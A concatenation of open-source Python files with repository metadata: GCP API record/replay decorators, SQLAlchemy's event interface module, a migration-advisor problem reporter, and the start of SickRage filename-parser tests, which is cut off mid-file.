LOGGER.debug('Recording key %s', request_key)
pickler.dump(requests)
outfile.flush()
return record_wrapper
return decorate
def replay(requests):
"""Record and serialize GCP API call answers.
Args:
requests (dict): A dictionary to store a copy of all requests and
responses in, after unpickling.
Returns:
function: Decorator function.
"""
def decorate(f):
"""Replay GCP API call answers.
Args:
f (function): Function to decorate
Returns:
function: Wrapped function.
"""
@functools.wraps(f)
def replay_wrapper(self, request, *args, **kwargs):
"""Replay and deserialize GCP API call answers.
Args:
self (object): Self of the caller.
request (HttpRequest): The HttpRequest object to execute.
**args (list): Additional args to pass through to function.
**kwargs (dict): Additional key word args to pass through to
function.
Returns:
object: The result object from the previous recording.
Raises:
Exception: Any exception raised during the previous recording.
"""
replay_file = os.environ.get(REPLAY_ENVIRONMENT_VAR, None)
if not replay_file:
return f(self, request, *args, **kwargs)
if not requests:
LOGGER.info('Loading replay file %s.', replay_file)
with open(replay_file, 'rb') as infile:
unpickler = pickle.Unpickler(infile)
requests.update(unpickler.load())
request_key = _key_from_request(request)
if request_key in requests:
results = requests[request_key]
# Pull the first result from the queue.
obj = results.popleft()
if obj['raised']:
raise obj['result'](*obj['exception_args'])
return obj['result']
else:
LOGGER.warning(
'Request URI %s with body %s not found in recorded '
'requests, executing live http request instead.',
request.uri, request.body)
return f(self, request, *args, **kwargs)
return replay_wrapper
return decorate
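# Example usage (a minimal sketch; the class and method names are
# hypothetical): stacking both decorators on the method that executes API
# requests lets FORSETI_RECORD_FILE / FORSETI_REPLAY_FILE toggle behavior:
#
#     _REQUESTS = {}
#
#     class ApiExecutor(object):
#         @record(_REQUESTS)
#         @replay(_REQUESTS)
#         def execute(self, request):
#             return request.execute()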
| apache-2.0 |
mmauroy/SickRage | lib/sqlalchemy/events.py | 75 | 35368 | # sqlalchemy/events.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Core event interfaces."""
from . import event, exc
from .pool import Pool
from .engine import Connectable, Engine, Dialect
from .sql.base import SchemaEventTarget
class DDLEvents(event.Events):
"""
Define event listeners for schema objects,
that is, :class:`.SchemaItem` and other :class:`.SchemaEventTarget`
subclasses, including :class:`.MetaData`, :class:`.Table`,
:class:`.Column`.
:class:`.MetaData` and :class:`.Table` support events
specifically regarding when CREATE and DROP
DDL is emitted to the database.
Attachment events are also provided to customize
behavior whenever a child schema element is associated
with a parent, such as, when a :class:`.Column` is associated
with its :class:`.Table`, when a :class:`.ForeignKeyConstraint`
is associated with a :class:`.Table`, etc.
Example using the ``after_create`` event::
from sqlalchemy import event
from sqlalchemy import Table, Column, MetaData, Integer
m = MetaData()
some_table = Table('some_table', m, Column('data', Integer))
def after_create(target, connection, **kw):
connection.execute("ALTER TABLE %s SET name=foo_%s" %
(target.name, target.name))
event.listen(some_table, "after_create", after_create)
DDL events integrate closely with the
:class:`.DDL` class and the :class:`.DDLElement` hierarchy
of DDL clause constructs, which are themselves appropriate
as listener callables::
from sqlalchemy import DDL
event.listen(
some_table,
"after_create",
DDL("ALTER TABLE %(table)s SET name=foo_%(table)s")
)
The methods here define the name of an event as well
as the names of members that are passed to listener
functions.
See also:
:ref:`event_toplevel`
:class:`.DDLElement`
:class:`.DDL`
:ref:`schema_ddl_sequences`
"""
_target_class_doc = "SomeSchemaClassOrObject"
_dispatch_target = SchemaEventTarget
def before_create(self, target, connection, **kw):
"""Called before CREATE statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
CREATE statement or statements will be emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def after_create(self, target, connection, **kw):
"""Called after CREATE statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
CREATE statement or statements have been emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def before_drop(self, target, connection, **kw):
"""Called before DROP statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
DROP statement or statements will be emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def after_drop(self, target, connection, **kw):
"""Called after DROP statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
DROP statement or statements have been emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def before_parent_attach(self, target, parent):
"""Called before a :class:`.SchemaItem` is associated with
a parent :class:`.SchemaItem`.
:param target: the target object
:param parent: the parent to which the target is being attached.
:func:`.event.listen` also accepts a modifier for this event:
:param propagate=False: When True, the listener function will
be established for any copies made of the target object,
i.e. those copies that are generated when
:meth:`.Table.tometadata` is used.
"""
def after_parent_attach(self, target, parent):
"""Called after a :class:`.SchemaItem` is associated with
a parent :class:`.SchemaItem`.
:param target: the target object
:param parent: the parent to which the target is being attached.
:func:`.event.listen` also accepts a modifier for this event:
:param propagate=False: When True, the listener function will
be established for any copies made of the target object,
i.e. those copies that are generated when
:meth:`.Table.tometadata` is used.
"""
def column_reflect(self, inspector, table, column_info):
"""Called for each unit of 'column info' retrieved when
a :class:`.Table` is being reflected.
The dictionary of column information as returned by the
dialect is passed, and can be modified. The dictionary
is that returned in each element of the list returned
by :meth:`.reflection.Inspector.get_columns`.
The event is called before any action is taken against
this dictionary, and the contents can be modified.
The :class:`.Column` specific arguments ``info``, ``key``,
and ``quote`` can also be added to the dictionary and
will be passed to the constructor of :class:`.Column`.
Note that this event is only meaningful if either
associated with the :class:`.Table` class across the
board, e.g.::
from sqlalchemy.schema import Table
from sqlalchemy import event
def listen_for_reflect(inspector, table, column_info):
"receive a column_reflect event"
# ...
event.listen(
Table,
'column_reflect',
listen_for_reflect)
...or with a specific :class:`.Table` instance using
the ``listeners`` argument::
def listen_for_reflect(inspector, table, column_info):
"receive a column_reflect event"
# ...
t = Table(
'sometable',
autoload=True,
listeners=[
('column_reflect', listen_for_reflect)
])
This is because the reflection process initiated by ``autoload=True``
completes within the scope of the constructor for :class:`.Table`.
"""
class PoolEvents(event.Events):
"""Available events for :class:`.Pool`.
The methods here define the name of an event as well
as the names of members that are passed to listener
functions.
e.g.::
from sqlalchemy import event
def my_on_checkout(dbapi_conn, connection_rec, connection_proxy):
"handle an on checkout event"
event.listen(Pool, 'checkout', my_on_checkout)
In addition to accepting the :class:`.Pool` class and
:class:`.Pool` instances, :class:`.PoolEvents` also accepts
:class:`.Engine` objects and the :class:`.Engine` class as
targets, which will be resolved to the ``.pool`` attribute of the
given engine or the :class:`.Pool` class::
engine = create_engine("postgresql://scott:tiger@localhost/test")
# will associate with engine.pool
event.listen(engine, 'checkout', my_on_checkout)
"""
_target_class_doc = "SomeEngineOrPool"
_dispatch_target = Pool
@classmethod
def _accept_with(cls, target):
if isinstance(target, type):
if issubclass(target, Engine):
return Pool
elif issubclass(target, Pool):
return target
elif isinstance(target, Engine):
return target.pool
else:
return target
def connect(self, dbapi_connection, connection_record):
"""Called at the moment a particular DBAPI connection is first
created for a given :class:`.Pool`.
This event allows one to capture the point directly after which
the DBAPI module-level ``.connect()`` method has been used in order
to produce a new DBAPI connection.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
"""
def first_connect(self, dbapi_connection, connection_record):
"""Called exactly once for the first time a DBAPI connection is
checked out from a particular :class:`.Pool`.
The rationale for :meth:`.PoolEvents.first_connect` is to determine
information about a particular series of database connections based
on the settings used for all connections. Since a particular
:class:`.Pool` refers to a single "creator" function (which in terms
of a :class:`.Engine` refers to the URL and connection options used),
it is typically valid to make observations about a single connection
that can be safely assumed to be valid about all subsequent connections,
such as the database version, the server and client encoding settings,
collation settings, and many others.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
"""
def checkout(self, dbapi_connection, connection_record, connection_proxy):
"""Called when a connection is retrieved from the Pool.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
:param connection_proxy: the :class:`._ConnectionFairy` object which
will proxy the public interface of the DBAPI connection for the lifespan
of the checkout.
If you raise a :class:`~sqlalchemy.exc.DisconnectionError`, the current
connection will be disposed and a fresh connection retrieved.
Processing of all checkout listeners will abort and restart
using the new connection.
.. seealso:: :meth:`.ConnectionEvents.engine_connect` - a similar event
which occurs upon creation of a new :class:`.Connection`.
"""
def checkin(self, dbapi_connection, connection_record):
"""Called when a connection returns to the pool.
Note that the connection may be closed, and may be None if the
connection has been invalidated. ``checkin`` will not be called
for detached connections. (They do not return to the pool.)
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
"""
def reset(self, dbapi_connection, connection_record):
"""Called before the "reset" action occurs for a pooled connection.
This event represents
when the ``rollback()`` method is called on the DBAPI connection
before it is returned to the pool. The behavior of "reset" can
be controlled, including disabled, using the ``reset_on_return``
pool argument.
The :meth:`.PoolEvents.reset` event is usually followed by the
:meth:`.PoolEvents.checkin` event, except in those
cases where the connection is discarded immediately after reset.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
.. versionadded:: 0.8
.. seealso::
:meth:`.ConnectionEvents.rollback`
:meth:`.ConnectionEvents.commit`
"""
def invalidate(self, dbapi_connection, connection_record, exception):
"""Called when a DBAPI connection is to be "invalidated".
This event is called any time the :meth:`._ConnectionRecord.invalidate`
method is invoked, either from API usage or via "auto-invalidation".
The event occurs before a final attempt to call ``.close()`` on the
connection.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
:param exception: the exception object corresponding to the reason
for this invalidation, if any. May be ``None``.
.. versionadded:: 0.9.2 Added support for connection invalidation
listening.
.. seealso::
:ref:`pool_connection_invalidation`
"""
class ConnectionEvents(event.Events):
"""Available events for :class:`.Connectable`, which includes
:class:`.Connection` and :class:`.Engine`.
The methods here define the name of an event as well as the names of
members that are passed to listener functions.
An event listener can be associated with any :class:`.Connectable`
class or instance, such as an :class:`.Engine`, e.g.::
from sqlalchemy import event, create_engine
def before_cursor_execute(conn, cursor, statement, parameters, context,
executemany):
log.info("Received statement: %s" % statement)
engine = create_engine('postgresql://scott:tiger@localhost/test')
event.listen(engine, "before_cursor_execute", before_cursor_execute)
or with a specific :class:`.Connection`::
with engine.begin() as conn:
@event.listens_for(conn, 'before_cursor_execute')
def before_cursor_execute(conn, cursor, statement, parameters,
context, executemany):
log.info("Received statement: %s" % statement)
The :meth:`.before_execute` and :meth:`.before_cursor_execute`
events can also be established with the ``retval=True`` flag, which
allows modification of the statement and parameters to be sent
to the database. The :meth:`.before_cursor_execute` event is
particularly useful here to add ad-hoc string transformations, such
as comments, to all executions::
from sqlalchemy.engine import Engine
from sqlalchemy import event
@event.listens_for(Engine, "before_cursor_execute", retval=True)
def comment_sql_calls(conn, cursor, statement, parameters,
context, executemany):
statement = statement + " -- some comment"
return statement, parameters
.. note:: :class:`.ConnectionEvents` can be established on any
combination of :class:`.Engine`, :class:`.Connection`, as well
as instances of each of those classes. Events across all
four scopes will fire off for a given instance of
:class:`.Connection`. However, for performance reasons, the
:class:`.Connection` object determines at instantiation time
whether or not its parent :class:`.Engine` has event listeners
established. Event listeners added to the :class:`.Engine`
class or to an instance of :class:`.Engine` *after* the instantiation
of a dependent :class:`.Connection` instance will usually
*not* be available on that :class:`.Connection` instance. The newly
added listeners will instead take effect for :class:`.Connection`
instances created subsequent to those event listeners being
established on the parent :class:`.Engine` class or instance.
:param retval=False: Applies to the :meth:`.before_execute` and
:meth:`.before_cursor_execute` events only. When True, the
user-defined event function must have a return value, which
is a tuple of parameters that replace the given statement
and parameters. See those methods for a description of
specific return arguments.
.. versionchanged:: 0.8 :class:`.ConnectionEvents` can now be associated
with any :class:`.Connectable` including :class:`.Connection`,
in addition to the existing support for :class:`.Engine`.
"""
_target_class_doc = "SomeEngine"
_dispatch_target = Connectable
@classmethod
def _listen(cls, event_key, retval=False):
target, identifier, fn = \
event_key.dispatch_target, event_key.identifier, event_key.fn
target._has_events = True
if not retval:
if identifier == 'before_execute':
orig_fn = fn
def wrap_before_execute(conn, clauseelement,
multiparams, params):
orig_fn(conn, clauseelement, multiparams, params)
return clauseelement, multiparams, params
fn = wrap_before_execute
elif identifier == 'before_cursor_execute':
orig_fn = fn
def wrap_before_cursor_execute(conn, cursor, statement,
parameters, context, executemany):
orig_fn(conn, cursor, statement,
parameters, context, executemany)
return statement, parameters
fn = wrap_before_cursor_execute
elif retval and \
identifier not in ('before_execute', 'before_cursor_execute'):
raise exc.ArgumentError(
"Only the 'before_execute' and "
"'before_cursor_execute' engine "
"event listeners accept the 'retval=True' "
"argument.")
event_key.with_wrapper(fn).base_listen()
def before_execute(self, conn, clauseelement, multiparams, params):
"""Intercept high level execute() events, receiving uncompiled
SQL constructs and other objects prior to rendering into SQL.
This event is good for debugging SQL compilation issues as well
as early manipulation of the parameters being sent to the database,
as the parameter lists will be in a consistent format here.
This event can be optionally established with the ``retval=True``
flag. The ``clauseelement``, ``multiparams``, and ``params``
arguments should be returned as a three-tuple in this case::
@event.listens_for(Engine, "before_execute", retval=True)
def before_execute(conn, clauseelement, multiparams, params):
# do something with clauseelement, multiparams, params
return clauseelement, multiparams, params
:param conn: :class:`.Connection` object
:param clauseelement: SQL expression construct, :class:`.Compiled`
instance, or string statement passed to :meth:`.Connection.execute`.
:param multiparams: Multiple parameter sets, a list of dictionaries.
:param params: Single parameter set, a single dictionary.
See also:
:meth:`.before_cursor_execute`
"""
def after_execute(self, conn, clauseelement, multiparams, params, result):
"""Intercept high level execute() events after execute.
:param conn: :class:`.Connection` object
:param clauseelement: SQL expression construct, :class:`.Compiled`
instance, or string statement passed to :meth:`.Connection.execute`.
:param multiparams: Multiple parameter sets, a list of dictionaries.
:param params: Single parameter set, a single dictionary.
:param result: :class:`.ResultProxy` generated by the execution.
"""
def before_cursor_execute(self, conn, cursor, statement,
parameters, context, executemany):
"""Intercept low-level cursor execute() events before execution,
receiving the string
SQL statement and DBAPI-specific parameter list to be invoked
against a cursor.
This event is a good choice for logging as well as late modifications
to the SQL string. It's less ideal for parameter modifications except
for those which are specific to a target backend.
This event can be optionally established with the ``retval=True``
flag. The ``statement`` and ``parameters`` arguments should be
returned as a two-tuple in this case::
@event.listens_for(Engine, "before_cursor_execute", retval=True)
def before_cursor_execute(conn, cursor, statement,
parameters, context, executemany):
# do something with statement, parameters
return statement, parameters
See the example at :class:`.ConnectionEvents`.
:param conn: :class:`.Connection` object
:param cursor: DBAPI cursor object
:param statement: string SQL statement
:param parameters: Dictionary, tuple, or list of parameters being
passed to the ``execute()`` or ``executemany()`` method of the
DBAPI ``cursor``. In some cases may be ``None``.
:param context: :class:`.ExecutionContext` object in use. May
be ``None``.
:param executemany: boolean, if ``True``, this is an ``executemany()``
call, if ``False``, this is an ``execute()`` call.
See also:
:meth:`.before_execute`
:meth:`.after_cursor_execute`
"""
def after_cursor_execute(self, conn, cursor, statement,
parameters, context, executemany):
"""Intercept low-level cursor execute() events after execution.
:param conn: :class:`.Connection` object
:param cursor: DBAPI cursor object. Will have results pending
if the statement was a SELECT, but these should not be consumed
as they will be needed by the :class:`.ResultProxy`.
:param statement: string SQL statement
:param parameters: Dictionary, tuple, or list of parameters being
passed to the ``execute()`` or ``executemany()`` method of the
DBAPI ``cursor``. In some cases may be ``None``.
:param context: :class:`.ExecutionContext` object in use. May
be ``None``.
:param executemany: boolean, if ``True``, this is an ``executemany()``
call, if ``False``, this is an ``execute()`` call.
"""
def dbapi_error(self, conn, cursor, statement, parameters,
context, exception):
"""Intercept a raw DBAPI error.
This event is called with the DBAPI exception instance
received from the DBAPI itself, *before* SQLAlchemy wraps the
exception with its own exception wrappers, and before any
other operations are performed on the DBAPI cursor; the
existing transaction remains in effect as well as any state
on the cursor.
The use case here is to inject low-level exception handling
into an :class:`.Engine`, typically for logging and
debugging purposes. In general, user code should **not** modify
any state or throw any exceptions here as this will
interfere with SQLAlchemy's cleanup and error handling
routines.
Subsequent to this hook, SQLAlchemy may attempt any
number of operations on the connection/cursor, including
closing the cursor, rolling back of the transaction in the
case of connectionless execution, and disposing of the entire
connection pool if a "disconnect" was detected. The
exception is then wrapped in a SQLAlchemy DBAPI exception
wrapper and re-thrown.
:param conn: :class:`.Connection` object
:param cursor: DBAPI cursor object
:param statement: string SQL statement
:param parameters: Dictionary, tuple, or list of parameters being
passed to the ``execute()`` or ``executemany()`` method of the
DBAPI ``cursor``. In some cases may be ``None``.
:param context: :class:`.ExecutionContext` object in use. May
be ``None``.
:param exception: The **unwrapped** exception emitted directly from the
DBAPI. The class here is specific to the DBAPI module in use.
.. versionadded:: 0.7.7
"""
def engine_connect(self, conn, branch):
"""Intercept the creation of a new :class:`.Connection`.
This event is called typically as the direct result of calling
the :meth:`.Engine.connect` method.
It differs from the :meth:`.PoolEvents.connect` method, which
refers to the actual connection to a database at the DBAPI level;
a DBAPI connection may be pooled and reused for many operations.
In contrast, this event refers only to the production of a higher level
:class:`.Connection` wrapper around such a DBAPI connection.
It also differs from the :meth:`.PoolEvents.checkout` event
in that it is specific to the :class:`.Connection` object, not the
DBAPI connection that :meth:`.PoolEvents.checkout` deals with, although
this DBAPI connection is available here via the :attr:`.Connection.connection`
attribute. But note there can in fact
be multiple :meth:`.PoolEvents.checkout` events within the lifespan
of a single :class:`.Connection` object, if that :class:`.Connection`
is invalidated and re-established. There can also be multiple
:class:`.Connection` objects generated for the same already-checked-out
DBAPI connection, in the case that a "branch" of a :class:`.Connection`
is produced.
:param conn: :class:`.Connection` object.
:param branch: if True, this is a "branch" of an existing
:class:`.Connection`. A branch is generated within the course
of a statement execution to invoke supplemental statements, most
typically to pre-execute a SELECT of a default value for the purposes
of an INSERT statement.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.PoolEvents.checkout` the lower-level pool checkout event
for an individual DBAPI connection
:meth:`.ConnectionEvents.set_connection_execution_options` - a copy of a
:class:`.Connection` is also made when the
:meth:`.Connection.execution_options` method is called.
"""
def set_connection_execution_options(self, conn, opts):
"""Intercept when the :meth:`.Connection.execution_options`
method is called.
This method is called after the new :class:`.Connection` has been
produced, with the newly updated execution options collection, but
before the :class:`.Dialect` has acted upon any of those new options.
Note that this method is not called when a new :class:`.Connection`
is produced which is inheriting execution options from its parent
:class:`.Engine`; to intercept this condition, use the
:meth:`.ConnectionEvents.engine_connect` event.
:param conn: The newly copied :class:`.Connection` object
:param opts: dictionary of options that were passed to the
:meth:`.Connection.execution_options` method.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ConnectionEvents.set_engine_execution_options` - event
which is called when :meth:`.Engine.execution_options` is called.
"""
def set_engine_execution_options(self, engine, opts):
"""Intercept when the :meth:`.Engine.execution_options`
method is called.
The :meth:`.Engine.execution_options` method produces a shallow
copy of the :class:`.Engine` which stores the new options. That new
:class:`.Engine` is passed here. A particular application of this
method is to add a :meth:`.ConnectionEvents.engine_connect` event
handler to the given :class:`.Engine` which will perform some per-
:class:`.Connection` task specific to these execution options.
:param engine: The newly copied :class:`.Engine` object
:param opts: dictionary of options that were passed to the
:meth:`.Engine.execution_options` method.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ConnectionEvents.set_connection_execution_options` - event
which is called when :meth:`.Connection.execution_options` is called.
"""
def begin(self, conn):
"""Intercept begin() events.
:param conn: :class:`.Connection` object
"""
def rollback(self, conn):
"""Intercept rollback() events, as initiated by a
:class:`.Transaction`.
Note that the :class:`.Pool` also "auto-rolls back"
a DBAPI connection upon checkin, if the ``reset_on_return``
flag is set to its default value of ``'rollback'``.
To intercept this
rollback, use the :meth:`.PoolEvents.reset` hook.
:param conn: :class:`.Connection` object
.. seealso::
:meth:`.PoolEvents.reset`
"""
def commit(self, conn):
"""Intercept commit() events, as initiated by a
:class:`.Transaction`.
Note that the :class:`.Pool` may also "auto-commit"
a DBAPI connection upon checkin, if the ``reset_on_return``
flag is set to the value ``'commit'``. To intercept this
commit, use the :meth:`.PoolEvents.reset` hook.
:param conn: :class:`.Connection` object
"""
def savepoint(self, conn, name):
"""Intercept savepoint() events.
:param conn: :class:`.Connection` object
:param name: specified name used for the savepoint.
"""
def rollback_savepoint(self, conn, name, context):
"""Intercept rollback_savepoint() events.
:param conn: :class:`.Connection` object
:param name: specified name used for the savepoint.
:param context: :class:`.ExecutionContext` in use. May be ``None``.
"""
def release_savepoint(self, conn, name, context):
"""Intercept release_savepoint() events.
:param conn: :class:`.Connection` object
:param name: specified name used for the savepoint.
:param context: :class:`.ExecutionContext` in use. May be ``None``.
"""
def begin_twophase(self, conn, xid):
"""Intercept begin_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
"""
def prepare_twophase(self, conn, xid):
"""Intercept prepare_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
"""
def rollback_twophase(self, conn, xid, is_prepared):
"""Intercept rollback_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
:param is_prepared: boolean, indicates if
:meth:`.TwoPhaseTransaction.prepare` was called.
"""
def commit_twophase(self, conn, xid, is_prepared):
"""Intercept commit_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
:param is_prepared: boolean, indicates if
:meth:`.TwoPhaseTransaction.prepare` was called.
"""
class DialectEvents(event.Events):
"""event interface for execution-replacement functions.
These events allow direct instrumentation and replacement
of key dialect functions which interact with the DBAPI.
.. note::
:class:`.DialectEvents` hooks should be considered **semi-public**
and experimental.
These hooks are not for general use and are only for those situations where
intricate re-statement of DBAPI mechanics must be injected onto an existing
dialect. For general-use statement-interception events, please
use the :class:`.ConnectionEvents` interface.
.. seealso::
:meth:`.ConnectionEvents.before_cursor_execute`
:meth:`.ConnectionEvents.before_execute`
:meth:`.ConnectionEvents.after_cursor_execute`
:meth:`.ConnectionEvents.after_execute`
.. versionadded:: 0.9.4
"""
_target_class_doc = "SomeEngine"
_dispatch_target = Dialect
@classmethod
def _listen(cls, event_key, retval=False):
target, identifier, fn = \
event_key.dispatch_target, event_key.identifier, event_key.fn
target._has_events = True
event_key.base_listen()
@classmethod
def _accept_with(cls, target):
if isinstance(target, type):
if issubclass(target, Engine):
return Dialect
elif issubclass(target, Dialect):
return target
elif isinstance(target, Engine):
return target.dialect
else:
return target
def do_executemany(self, cursor, statement, parameters, context):
"""Receive a cursor to have executemany() called.
Return the value True to halt further events from invoking,
and to indicate that the cursor execution has already taken
place within the event handler.
"""
def do_execute_no_params(self, cursor, statement, context):
"""Receive a cursor to have execute() with no parameters called.
Return the value True to halt further events from invoking,
and to indicate that the cursor execution has already taken
place within the event handler.
"""
def do_execute(self, cursor, statement, parameters, context):
"""Receive a cursor to have execute() called.
Return the value True to halt further events from invoking,
and to indicate that the cursor execution has already taken
place within the event handler.
"""
| gpl-3.0 |
open-power-sdk/migration-advisor | ma/problem_reporter.py | 1 | 5434 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2017 IBM Corporation
Licensed under the Apache License, Version 2.0 (the “License”);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an “AS IS” BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contributors:
* Roberto Oliveira <rdutra@br.ibm.com>
* Diego Fernandez-Merjildo <merjildo@br.ibm.com>
"""
from . import core
from .report_blocker import ReportBlocker
class ProblemReporter(object):
""" Class to handle with reported problems """
problems = {}
@classmethod
def report_include(cls, name, file_name, line, problem_type, problem_msg,
solution):
""" Report a problem in an include directive """
if not cls.__should_report(file_name, line, file_name):
return
name = "include " + name
problem = Problem(name, file_name, line, problem_msg, solution)
cls.__report_problem(problem, problem_type)
@classmethod
def report_node(cls, node, current_file, problem_type, problem_msg,
solution):
""" Report a problem in a node """
node_loc = node.location
node_file = node_loc.file
node_line = node_loc.line
if not cls.__should_report(node_file, node_line, current_file):
return
name = core.get_raw_node(node)
problem = Problem(name, node_file, node_line, problem_msg, solution)
cls.__report_problem(problem, problem_type)
@classmethod
def report_file(cls, file_name, num_line, name, problem_type, problem_msg,
solution):
""" Report a problem in a file """
if not cls.__should_report(file_name, num_line, file_name):
return
problem = Problem(name, file_name, num_line, problem_msg, solution)
cls.__report_problem(problem, problem_type)
@classmethod
def __report_problem(cls, problem, problem_type):
""" Add the reported problem in a dictionary """
if cls.problems.get(problem_type, None) is not None:
cls.problems.get(problem_type).append(problem)
else:
problem_list = []
problem_list.append(problem)
cls.problems[problem_type] = problem_list
@classmethod
def print_problems(cls):
""" Print all reported problems """
if not cls.problems:
print("\nNo migration reports found.")
return
tab = " "
cls.__print_logo()
for problem_type, problems in cls.problems.items():
problems_dict = {}
# Group problems by file
for problem in problems:
name = problem.file_name
problems_dict[name] = problems_dict.get(name, []) + [problem]
print("Problem type: " + problem_type)
print("Problem description: " + problems[0].problem_msg)
for file_name, file_problems in problems_dict.items():
print(tab + "File: " + file_name)
for problem in file_problems:
print((tab * 2) + "Line: " + str(problem.line))
print((tab * 2) + "Problem: " + str(problem.name))
if problem.solution:
print((tab * 2) + "Solution: " + problem.solution)
print("")
print("")
@classmethod
def get_problems(cls):
""" Get all reported problems """
return cls.problems
@classmethod
def clear_problems(cls):
""" Clear reported problems """
cls.problems.clear()
@classmethod
def __should_report(cls, node_file, node_line, current_file):
""" Check if should report the node """
# Location is not known
if not node_file:
return False
# Node is not in the current file
if str(node_file) != current_file:
return False
# Node is inside a blocked line
if node_line in ReportBlocker.blocked_lines:
return False
return True
@classmethod
def __print_logo(cls):
""" Print the report logo """
title = "Migration Report"
border = "=" * len(title)
print("")
print(border)
print(title)
print(border)
class Problem(object):
""" Class to represent a problem """
def __init__(self, name, file_name, line, problem_msg, solution):
self._name = name
self._file_name = str(file_name)
self._line = line
self._problem_msg = problem_msg
self._solution = solution
@property
def name(self):
""" Raw name """
return self._name
@property
def problem_msg(self):
""" Problem message """
return self._problem_msg
@property
def solution(self):
""" Solution for the problem """
return self._solution
@property
def file_name(self):
""" File name """
return self._file_name
@property
def line(self):
""" Line number """
return self._line
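# A minimal usage sketch of the reporter (assumption: the file name, line
# number and messages below are made up for illustration):
#
#     ProblemReporter.report_file("src/main.c", 42, "__builtin_foo",
#                                 "Builtin", "Non-portable builtin used",
#                                 "Replace with a portable equivalent")
#     ProblemReporter.print_problems()
#     ProblemReporter.clear_problems()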
| apache-2.0 |
srluge/SickRage | tests/name_parser_tests.py | 1 | 17619 | import sys, os.path
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname(__file__), '../lib')))
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import datetime
import unittest
from tests import test_lib as test
import sickbeard
from sickbeard import tv
from sickbeard.name_parser import parser
from sickrage.helper.encoding import ek
sickbeard.SYS_ENCODING = 'UTF-8'
DEBUG = VERBOSE = False
simple_test_cases = {
'standard': {
'Mr.Show.Name.S01E02.Source.Quality.Etc-Group': parser.ParseResult(None, 'Mr Show Name', 1, [2], 'Source.Quality.Etc', 'Group'),
'Show.Name.S01E02': parser.ParseResult(None, 'Show Name', 1, [2]),
'Show Name - S01E02 - My Ep Name': parser.ParseResult(None, 'Show Name', 1, [2], 'My Ep Name'),
'Show.1.0.Name.S01.E03.My.Ep.Name-Group': parser.ParseResult(None, 'Show 1.0 Name', 1, [3], 'My.Ep.Name', 'Group'),
'Show.Name.S01E02E03.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'Source.Quality.Etc', 'Group'),
'Mr. Show Name - S01E02-03 - My Ep Name': parser.ParseResult(None, 'Mr. Show Name', 1, [2, 3], 'My Ep Name'),
'Show.Name.S01.E02.E03': parser.ParseResult(None, 'Show Name', 1, [2, 3]),
'Show.Name-0.2010.S01E02.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name-0 2010', 1, [2], 'Source.Quality.Etc', 'Group'),
'S01E02 Ep Name': parser.ParseResult(None, None, 1, [2], 'Ep Name'),
'Show Name - S06E01 - 2009-12-20 - Ep Name': parser.ParseResult(None, 'Show Name', 6, [1], '2009-12-20 - Ep Name'),
'Show Name - S06E01 - -30-': parser.ParseResult(None, 'Show Name', 6, [1], '30-'),
'Show-Name-S06E01-720p': parser.ParseResult(None, 'Show-Name', 6, [1], '720p'),
'Show-Name-S06E01-1080i': parser.ParseResult(None, 'Show-Name', 6, [1], '1080i'),
'Show.Name.S06E01.Other.WEB-DL': parser.ParseResult(None, 'Show Name', 6, [1], 'Other.WEB-DL'),
'Show.Name.S06E01 Some-Stuff Here': parser.ParseResult(None, 'Show Name', 6, [1], 'Some-Stuff Here')
},
'fov': {
'Show_Name.1x02.Source_Quality_Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2], 'Source_Quality_Etc', 'Group'),
'Show Name 1x02': parser.ParseResult(None, 'Show Name', 1, [2]),
'Show Name 1x02 x264 Test': parser.ParseResult(None, 'Show Name', 1, [2], 'x264 Test'),
